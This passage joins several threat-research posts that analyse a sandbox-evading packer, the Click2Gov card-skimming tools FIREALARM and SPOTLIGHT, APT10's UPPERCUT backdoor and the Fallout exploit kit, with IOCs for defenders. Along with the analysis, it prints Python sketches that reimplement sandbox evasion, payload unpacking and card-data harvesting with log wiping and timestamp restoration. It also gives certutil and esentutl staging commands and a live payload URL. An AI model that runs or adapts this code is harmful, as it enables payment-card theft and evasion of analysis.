Another example is a typical quotation-themed spam email that carries an exploit document as an attachment (hash: 0543e266012d9a3e33a9688a95fce358), which leverages an Equation Editor vulnerability to drop the payload (Figure 4).


Figure 4: Spam example 2

The documents in the examples fetched a payload from http://5.152.203.115/win32.exe. This turned out to be Lokibot malware.

User Activity Checks

The packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses the GetForegroundWindow API to check whether the user changes windows at least three times before it executes further. If it does not observe these window changes, it puts itself into an infinite sleep. The code is shown in Figure 5. Interestingly, some publicly available sandboxes can be detected by this simple technique.


Figure 5: Window change check

To confirm user activity, a second variant of the packer checks for mouse cursor movement using GetCursorPos and Sleep APIs, while a third variant checks for system idle state using GetLastInputInfo and GetTickCount APIs.
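These checks rely on only a handful of Win32 APIs. The following Python (ctypes) sketch approximates the first two variants; the polling intervals and thresholds are assumptions, and the real packer implements this logic natively in Delphi.

```python
import ctypes
import time
from ctypes import wintypes

user32 = ctypes.windll.user32  # Windows only

def window_changed_three_times(poll_seconds=1):
    """Variant 1: wait until the foreground window changes at least 3 times."""
    changes, last = 0, user32.GetForegroundWindow()
    while changes < 3:
        time.sleep(poll_seconds)
        current = user32.GetForegroundWindow()
        if current != last:
            changes += 1
            last = current
    return True

def cursor_moved(poll_seconds=1):
    """Variant 2: compare cursor positions across a short sleep."""
    first, second = wintypes.POINT(), wintypes.POINT()
    user32.GetCursorPos(ctypes.byref(first))
    time.sleep(poll_seconds)
    user32.GetCursorPos(ctypes.byref(second))
    return (first.x, first.y) != (second.x, second.y)
```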

Extracting Real Payloads from the PE Resources

The original payload is split into multiple binary blobs and stored in various locations inside the resource directory, as shown in Figure 6.


Figure 6: Bitmap resource with encrypted contents

To locate and assemble the real payload bytes, the packer code first reads content directly from a hardcoded resource ID inside the resource section. The first 16 bytes of this content form a XOR key used to decrypt the rest of the bytes using a rolling XOR. The decrypted bytes represent an internal data structure, as shown in Figure 7, which the packer uses to reference encrypted and obfuscated buffers at various resource IDs.


Figure 7: Structure showing encrypted file information

The packer then reads values from the encrypted buffers, starting from dwStartResourceId to dwStartResourceId+dwNumberOfResources, and brings them to a single location by reading chunks of dwChunkSize. Once the final data buffer is prepared, it starts decrypting it using the same rolling XOR algorithm mentioned previously and the new key from the aforementioned structure, producing the core payload executable. This script can be used to extract the real payload statically.
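The following minimal Python sketch models the unpacking logic described above. It assumes a common interpretation of "rolling XOR" (the 16-byte key cycled over the data), and the structure field offsets are illustrative; it is not the linked extraction script.

```python
import struct

def rolling_xor(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key, cycling the key over the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def unpack_payload(index_blob: bytes, read_resource) -> bytes:
    """index_blob: raw bytes of the hardcoded resource; read_resource(rid) -> bytes."""
    key, encrypted = index_blob[:16], index_blob[16:]
    info = rolling_xor(encrypted, key)

    # Assumed layout of the internal structure (offsets are illustrative).
    start_id, count, chunk_size = struct.unpack_from("<III", info, 0)
    payload_key = info[12:28]

    # Gather the split blobs from the resource IDs and decrypt the final buffer.
    blob = b"".join(read_resource(rid)[:chunk_size]
                    for rid in range(start_id, start_id + count))
    return rolling_xor(blob, payload_key)
```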

Classification of Real Families

Many of the unpacked binaries that we were able to extract from the sample set were identified as belonging to the Lokibot malware family. We were also able to identify Pony, IRStealer, Nanocore, Netwire, Remcos, and nJRAT malware families, as well as a coin mining malware family, among others. A distribution of the malware families using the packer is shown in Figure 8. This diversity of malware families implies that many threat actors are using this "crypting" service/tool for their operations, possibly purchasing it directly from the developer.


Figure 8: Distribution of malware families using packer

Conclusion

Packers and crypter services provide threat actors an easy and convenient option to outsource the work of keeping their real payloads undetected and unclassified for as long as possible. Attackers regularly find nifty ways to bypass sandbox environments with anti-analysis techniques; hence, detonating malware samples in a sandbox environment that models real user behavior is a safe bet.

FireEye MVX Engine both detects and blocks this activity.

Indicators of Compromise (IOCs)

  • 853bed3ad5cc4b1471e959bfd0ea7c7c
  • e3c421d404c08809dd8ee3365552e305
  • 14e5326c5da90cd6619b7fe1bc4a97e1
  • dc999a1a2c5e796e450c0a6a61950e3f
  • 3ad781934e67a8b84739866b0b55544b
  • b4f5e691b264103b9c4fb04fa3429f1e

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appears to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle WebLogic, such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, which by default runs as the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed, possibly to inhibit detection; Chinese characters that were changed to English; references to SJavaWebManage that were deleted; and the removal of code that handled updates to the webshell. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments: year, month, and day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 through the present day. If a log file exists, FIREALARM copies its MAC (Modified, Accessed, Created) times so it can later timestomp the file back to its original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied over the respective Click2GovCX log file and the timestamps are restored to the original, copied values. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.


Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or another proxy and authenticates to SJavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file, and timestomps it with the original times.
  5. THN1080.tmp is deleted.
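The mining and cleanup workflow can be approximated in a few lines of Python. The log line format below (key/value pairs containing the medium.* fields) is an assumption, the field list is abbreviated, and only the modified/accessed timestamps are restored; the real tool is a native binary that also restores the created time.

```python
import os
import re

# Abbreviated subset of the fields FIREALARM searches for.
FIELDS = ["medium.accountNumber", "medium.cvv2", "medium.expirationDate.year",
          "medium.expirationDate.month", "medium.firstName", "medium.lastName"]

def mine_log(path):
    """Print card fields found in a Click2GovCX-style log and keep only ERROR lines."""
    stat = os.stat(path)                    # remember the original timestamps
    kept = []
    with open(path, "r", errors="ignore") as fh:
        for line in fh:
            hits = {f: m.group(1) for f in FIELDS
                    if (m := re.search(re.escape(f) + r"\s*[:=]\s*(\S+)", line))}
            if hits:
                print(" | ".join(f"{k}={v}" for k, v in hits.items()))
            if "ERROR -" in line:
                kept.append(line)           # only error lines survive the rewrite
    with open(path, "w") as fh:
        fh.writelines(kept)                 # overwrite the log with error lines only
    os.utime(path, (stat.st_atime, stat.st_mtime))  # restore accessed/modified times
```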

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence on the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed via command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on ports 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs: the buffer exceeds 102,399 bytes, or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these conditions occurs, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.
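The parsing stage of this workflow is straightforward to model. The Python sketch below extracts the tags listed above from a captured POST body, joins the values with the | separator, and Base64-encodes the result in the manner described for SPOTLIGHT; the packet capture and service mechanics are omitted and the file handling shown is illustrative.

```python
import base64
import re

TAGS = ["AccountNum", "CSC", "ExpDate", "FirstName", "LastName", "MInitial",
        "Street1", "Street2", "City", "State", "PostalCode"]

def extract_record(post_body: str) -> str:
    """Pull <op:...> values from a OnePointService POST and encode them like opt.log entries."""
    values = []
    for tag in TAGS:
        m = re.search(rf"<op:{tag}>(.*?)</op:{tag}>", post_body, re.S)
        values.append(m.group(1).strip() if m else "")
    record = "|".join(values)
    return base64.b64encode(record.encode()).decode()

# Example: append one encoded record to a local log, as the malware does with opt.log.
# with open("opt.log", "a") as fh:
#     fh.write(extract_record(captured_post) + "\n")
```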

Attribution

Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and the code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure that any web service accounts run with least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware to exploit Click2Gov installations, achieving moderate success. Although the activity may resurface in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team, part of Technical Operations & Reverse Engineering – Advanced Practices, works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations of intrusions assessed as directly supporting nation-state or financial-gain objectives and involving interactive, focused efforts against targeted organizations. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

APT10 Targeting Japanese Corporations Using Updated TTPs

Introduction

In July 2018, FireEye devices detected and blocked what appears to be APT10 (Menupass) activity targeting the Japanese media sector. APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009, and they have a history of targeting Japanese entities.

In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. This backdoor is well-known in the security community as ANEL, and until recently it had only been seen in beta or RC (release candidate) versions. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor.

Attack Overview

The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails. Although the contents of the malicious documents are unreadable (see Figure 3), the Japanese titles are related to maritime, diplomatic, and North Korean issues. Table 1 shows the UPPERCUT indicators of compromise (IoCs).

| File Name | MD5 | Size | C2 |
| --- | --- | --- | --- |
| 自民党海洋総合戦略小委員会が政府に提言申し入れ.doc (Government Recommendations from the Liberal Democratic Party’s Comprehensive Strategic Maritime Subcommittee) | 4f83c01e8f7507d23c67ab085bf79e97 | 843022 | eservake.jetos[.]com, 82.221.100.52, 151.106.53.147 |
| グテマラ大使講演会案内状.doc (Invitation to Lecture by Guatemalan Ambassador) | f188936d2c8423cf064d6b8160769f21 | 720384 | eservake.jetos[.]com, 151.106.53.147, 153.92.210.208 |
| 米国接近に揺れる北朝鮮内部.doc (North Korean interior swayed by the approach of the United States) | cca227f70a64e1e7fcf5bccdc6cc25dd | 733184 | eservake.jetos[.]com, 153.92.210.208, 167.99.121.203 |

Table 1: UPPERCUT IoCs

For the North Korean lure, a news article with an identical title was readily available online. It’s also worth noting that in the Guatemalan lure, the attacker used an unusual spelling of Guatemala in Japanese. The top result of a Google search using the same spelling led us to the event website for the lecture of the Guatemalan Ambassador, held in August 2018. Figure 1 shows the screenshot of the event page.


Figure 1: Event Website for the Lecture of Guatemala Ambassador

Figure 2 shows the macro function that displays the lure document. At the bottom of this function, we can see the readable text that matches the contact information found in Figure 1. Thus, people who would have an interest in Latin American issues may have been the targets of this campaign.


Figure 2: Macro to display lure document

The initial Word documents were password protected, likely in an effort to bypass detection. Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3.


Figure 3: Lure document

Figure 4 shows what happens when the malicious macro is executed.


Figure 4: Macro to install UPPERCUT

The execution workflow is as follows:

1.     The macro drops three PEM files, padre1.txt, padre2.txt, and padre3.txt, to the victim’s %TEMP% folder and then copies them from %TEMP% to the %AllUserProfile% folder.

2.     The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows):

"C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre1.txt C:\ProgramData\\GUP.txt

"C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre2.txt C:\ProgramData\\libcurl.txt

"C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre3.txt C:\ProgramData\\3F2E3AB9

3.     The macro creates a copy of the files with their proper extensions using the Extensible Storage Engine Utilities (esentutl.exe) with the following commands (esentutl.exe is also a legitimate program that is pre-installed in Windows):

"C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\GUP.txt /d C:\ProgramData\GUP.exe /o

"C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\libcurl.txt /d C:\ProgramData\libcurl.dll /o

The dropped files include the following:

  • GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates. The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5.
  • libcurl.dll: Malicious Loader DLL
  • 3F2E3AB9: Encrypted shellcode


Figure 5: Notepad++ signed updater

4.     The macro launches the legitimate executable GUP.exe.

  • The executable sideloads the malicious DLL (libcurl.dll), which decrypts and runs shellcode (3F2E3AB9) located in the same folder.
  • The shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT. Before decoding the DLL, the shellcode uses an anti-debug technique based on ntdll_NtSetInformationThread which causes the thread to be detached from the debugger, as shown in Figure 6. The DLL is then loaded into memory and the randomly named exported function is called.


Figure 6: Anti-debug technique used by shellcode

5.     The macro deletes the initially dropped .txt files using Windows esentutl.exe and changes the document text to an embedded message.

The complete attack overview is shown in Figure 7.


Figure 7: Attack overview

Several threat actors leverage the technique of using Windows certutil.exe for payload decoding, and APT10 continues to employ this technique.

Evolution of UPPERCUT

Figure 8 shows the timeline of updates for UPPERCUT. The PE compile times of the loaders and the creation times of the droppers (Word documents) are plotted in the graph. The compile times of the loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into the UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.


Figure 8: Timeline of UPPERCUT updates

Unlike previous versions, the exported function names are randomized in the latest version (Table 2).

| Decoded Payload MD5 | Size | Import Hash | Exported Function | Version |
| --- | --- | --- | --- | --- |
| aa3f303c3319b14b4829fe2faa5999c1 | 322164 | 182ee99b4f0803628c30411b1faa9992 | l7MF25T96n45qOGWX | 5.3.2 |
| 126067d634d94c45084cbe1d9873d895 | 330804 | 5f45532f947501cf024d84c36e3a19a1 | hJvTJcdAU3mNkuvGGq7L | 5.4.1 |
| fce54b4886cac5c61eda1e7605483ca3 | 345812 | c1942a0ca397b627019dace26eca78d8 | WcuH | 5.4.1 |

Table 2: Static characteristics of UPPERCUT

Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection.


Figure 9: Example of callback

Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. In the latest version, however, a unique key is hard-coded for each C2 address, and the malware uses the calculated MD5 hash of the C2 address to determine which key to use, as shown in Figure 10.


Figure 10: Blowfish key generation

For instance, Table 3 lists the hard-coded C2 addresses, their MD5 hash, and the corresponding Blowfish key in the decoded payload of 126067d634d94c45084cbe1d9873d895.

| C2 | MD5 | Blowfish Key |
| --- | --- | --- |
| hxxp[:]//151.106.53[.]147/VxQG | f613846eb5bed227ec1a5f8df7e678d0 | bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d |
| hxxp[:]//153.92.210[.]208/wBNh1 | 50c60f37922ff2ff8733aaeaa9802da5 | fb9f7fb3c709373523ff27824ed6a31d800e275ec5217d8a11024a3dffb577dd |
| hxxp[:]//eservake.jetos[.]com/qIDj | c500dae1ca41236830b59f1467ee96c1 | d3450966ceb2eba93282aace7d7684380d87c6621bbd3c4f621caa079356004a |
| Default | Default | f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53 |

Table 3: Example of Blowfish keys

In this example, the MD5 hash of hxxp[:]//151.106.53[.]147/VxQG will be f613846eb5bed227ec1a5f8df7e678d0. When the malware interacts with this URL, bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d will be selected as a Blowfish key. If the MD5 hash of the URL does not match any of the listed hashes, then the default key f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53 will be used.
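The key-selection logic can be expressed compactly, as in the Python sketch below, which uses the hashes and keys from Table 3. Exactly which string the malware hashes (full URL versus host) and how the hex key material is fed to Blowfish are not confirmed here.

```python
import hashlib

# MD5(C2 URL) -> hard-coded Blowfish key, per Table 3.
KEYS = {
    "f613846eb5bed227ec1a5f8df7e678d0":
        "bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d",
    "50c60f37922ff2ff8733aaeaa9802da5":
        "fb9f7fb3c709373523ff27824ed6a31d800e275ec5217d8a11024a3dffb577dd",
    "c500dae1ca41236830b59f1467ee96c1":
        "d3450966ceb2eba93282aace7d7684380d87c6621bbd3c4f621caa079356004a",
}
DEFAULT_KEY = "f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53"

def select_blowfish_key(c2_url: str) -> str:
    """Return the hard-coded Blowfish key for a C2 URL, or the default key."""
    digest = hashlib.md5(c2_url.encode()).hexdigest()
    return KEYS.get(digest, DEFAULT_KEY)

# Refang the defanged IOC before hashing; the hashes above correspond to the
# real URL strings, so a defanged string would fall through to the default key.
url = "hxxp[:]//151.106.53[.]147/VxQG".replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")
print(select_blowfish_key(url))
```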

Another difference in the network traffic generated by the malware is that encoded proxy information has been added to the URL query values during C2 communication. Table 4 shows the parameters sent to the C2 server by the backdoor in the newer versions. These are sent via a POST request, as shown in Figure 9.


Table 4: URL parameters

Additionally, the command string is hashed using the same RGPH hashing algorithm as before. Two more commands, 0xD290626C85FB1CE3 and 0x409C7A89CFF0A727, are supported in the newer versions (Table 5).

| Commands | Description |
| --- | --- |
| 0x97A168D9697D40DD | Download and validate file (XXHash comparison) from C2 server |
| 0x7CF812296CCC68D5 | Upload file to C2 server |
| 0x652CB1CEFF1C0A00 | Load PE file |
| 0x27595F1F74B55278 | Download, validate (XXHash comparison), execute file, and send output to C2 server |
| 0xD290626C85FB1CE3 | Format the current timestamp |
| 0x409C7A89CFF0A727 | Capture the desktop screenshot in PNG format and send it to C2 |
| None of the above | The received buffer is executed via cmd.exe and the output is sent to the C2 server |

Table 5: Supported commands
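A hash-keyed dispatch loop of the kind described above might look like the Python sketch below. Only the constants from Table 5 are used; the RGPH hash itself is not reproduced, and the handler bodies are placeholders.

```python
def handle(command_hash: int, buffer: bytes) -> None:
    """Dispatch a received command hash to its handler (descriptions per Table 5)."""
    handlers = {
        0x97A168D9697D40DD: lambda b: print("download + XXHash-validate file from C2"),
        0x7CF812296CCC68D5: lambda b: print("upload file to C2"),
        0x652CB1CEFF1C0A00: lambda b: print("load PE file"),
        0x27595F1F74B55278: lambda b: print("download, validate, execute, return output"),
        0xD290626C85FB1CE3: lambda b: print("format current timestamp"),
        0x409C7A89CFF0A727: lambda b: print("capture desktop screenshot as PNG"),
    }
    # Anything unrecognized is treated as a command line, per the last table row.
    handlers.get(command_hash, lambda b: print("execute buffer via cmd.exe"))(buffer)
```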

Conclusion

While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way the backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware.

To mitigate the threat, users are advised to disable Office macros in their settings and not to open documents from unknown sources. FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat with the following detection names:

  • APT.Backdoor.Win.UPPERCUT
  • FE_APT_Backdoor_Win32_UPPERCUT

Fallout Exploit Kit Used in Malvertising Campaign to Deliver GandCrab Ransomware

Towards the end of August 2018, FireEye identified a new exploit kit (EK) that was being served up as part of a malvertising campaign affecting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

The first instance of the campaign was observed on Aug. 24, 2018, on the domain finalcountdown[.]gq. Tokyo-based researchers “nao_sec” identified an instance of this campaign on Aug. 29, and in their own blog post they refer to the exploit kit as Fallout Exploit Kit. As part of our research, we observed additional domains, regions, and payloads associated with the campaign. In addition to the SmokeLoader distribution in Japan mentioned in the nao_sec blog post, we observed GandCrab ransomware being distributed in the Middle East, which is the focus of this blog post.

Fallout EK fingerprints the user’s browser profile and delivers malicious content if the profile matches a target of interest. If a match occurs, the user is redirected from a genuine advertiser page, via multiple 302 redirects, to the exploit kit landing page URL. The complete chain from the legitimate domain, through cushion domains, to the exploit kit landing page is shown in Figure 1.


Figure 1: Malvertisement redirection to Fallout Exploit Kit landing page

The main ad page prefetches cushion domain links while loading the ad and uses the <noscript> tag to load separate links in cases where JavaScript is disabled in a browser (Figure 2).


Figure 2: Content in the first ad page

In regions not mentioned earlier in this blog post, the link rel="dns-prefetch" href attribute has a different value and the ad does not lead to the exploit kit. The complete chain of redirection via 302 hops is shown in Figures 3, 4, and 5.


Figure 3: 302 redirect to exploit kit controlled cushion servers


Figure 4: Another redirection before exploit kit landing page


Figure 5: Last redirect before user reaches exploit kit landing page

URIs for the landing page change constantly and are too generic to fingerprint, which makes detection difficult for IDS solutions that rely on particular URI patterns.

Depending on browser/OS profiles and the location of the user, the malvertisement either delivers the exploit kit or tries to reroute the user to other social engineering campaigns. For example, in the U.S. on a fully patched macOS system, malvertising redirects users to social engineering attempts similar to those shown in Figure 6 and Figure 7.


Figure 6: Fake AV prompt for Mac users


Figure 7: Fake Flash download prompt

The strategy is consistent with the rise in social engineering attempts FireEye has been observing for some time, where bad actors use these lures to target users on fully patched systems, or on OS/software profiles that are unsuitable for exploitation. The malvertisement redirect involved in this campaign has also been abused heavily in many social engineering campaigns in North America.

FireEye Dynamic Threat Intelligence (DTI) shows that this campaign has triggered alerts from customers in the government, telecom and healthcare sectors.

Landing Page

Initially, the landing page only contained code for a VBScript vulnerability (CVE-2018-8174). However, Flash embedding code was later added for more reliable execution of the payload.

The landing page keeps the VBScript code as Base64 encoded text in the ‘<span>’ tag. It loads a JScript function when the page loads, which decodes the next stage VBScript code and executes it using the VBScript ExecuteGlobal function (Figure 8).


Figure 8: Snippet of landing page

Figure 9 shows the JScript function that decodes the malicious VBScript code.


Figure 9: Base64 decode function

Flash embedding code is inside the ‘noscript’ tag and loads only when scripts are disabled (Figure 10).


Figure 10: Flash embedding code

The decoded VBScript code exploits the CVE-2018-8174 vulnerability and executes shellcode (Figure 11).


Figure 11: Decoded VBScript

The shellcode downloads an XOR'd payload to the %temp% location, decrypts it, and executes it (Figure 12).


Figure 12: XOR binary transfer that decrypts to 4072690b935cdbfd5c457f26f028a49c

Payload Analysis (4072690b935cdbfd5c457f26f028a49c)

The malware contains PE loader code that is used for initial loading and final payload execution (Figure 13).


Figure 13: Imports resolver from the PE loader

The unpacked DLL 83439fb10d4f9e18ea7d1ebb4009bdf7 starts by initializing a structure of function pointers to the malware's core functionality (Figure 14).


Figure 14: Core structure populated with function pointers

It then enumerates all running processes, computes the CRC32 checksum of each process name, and tries to match them against a list of blacklisted checksums. The checksums and their corresponding process names are listed in Table 1.

CRC32 Checksum | Process Name
99DD4432h | vmwareuser.exe
2D859DB4h | vmwareservice.exe
64340DCEh | vboxservice.exe
63C54474h | vboxtray.exe
